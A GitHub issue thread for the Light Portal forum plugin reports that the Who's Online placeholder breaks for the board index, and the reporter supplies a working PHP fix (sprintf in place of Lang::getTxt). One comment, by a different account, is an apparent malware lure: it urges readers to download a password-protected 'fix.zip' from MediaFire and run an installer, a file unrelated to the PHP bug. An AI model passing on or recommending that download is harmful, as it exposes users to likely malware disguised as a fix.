### ISSUE TITLE
Who's Online - placeholder issue if viewing the board index

### ISSUE THREAD

**Issue by Darknico** [dragomano/Light-Portal#240]
**Describe the bug** (**Опишите баг**)
If an user is viewing the board index, the placeholder not work correctly

**To Reproduce** (**Как воспроизвести, по шагам**)
1. Go to Who's Online
2. Check the list. 

**Expected behavior** (**Ожидаемое поведение — что хотели получить вместо бага**)
The correct string, for example "Viewing the board index of [My Forum](https://myforum.ext/index.php?action=forum)"

**Screenshots**
![immagine](https://github.com/user-attachments/assets/8a795e5c-6adf-4358-be24-aca3eacc27de)

**Environment**
- Version/Git revision: 2.7.1
- Database Type: MySQL 
- Database Version: 5.7.28
- PHP Version: 8.2.20
- SMF Version: 2.1.4

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Darknico** [comment]
I fixed in my forum with this edit:

file: /Sources/LightPortal/Hooks/WhosOnline.php

Search:

`		if ($actions['action'] === 'forum') {
			$result = Lang::getTxt('who_index', [
				Config::$scripturl . '?action=forum',
				Utils::$context['forum_name']
			]);
		}`

Replace with:

`		if ($actions['action'] === 'forum') {
			$result = sprintf(
				Lang::$txt['who_index'],
				Config::$scripturl . '?action=forum',
				Utils::$context['forum_name']
			);
		}`

**Comment by Darknico** [comment]
Fix tested and work correctly :+1:
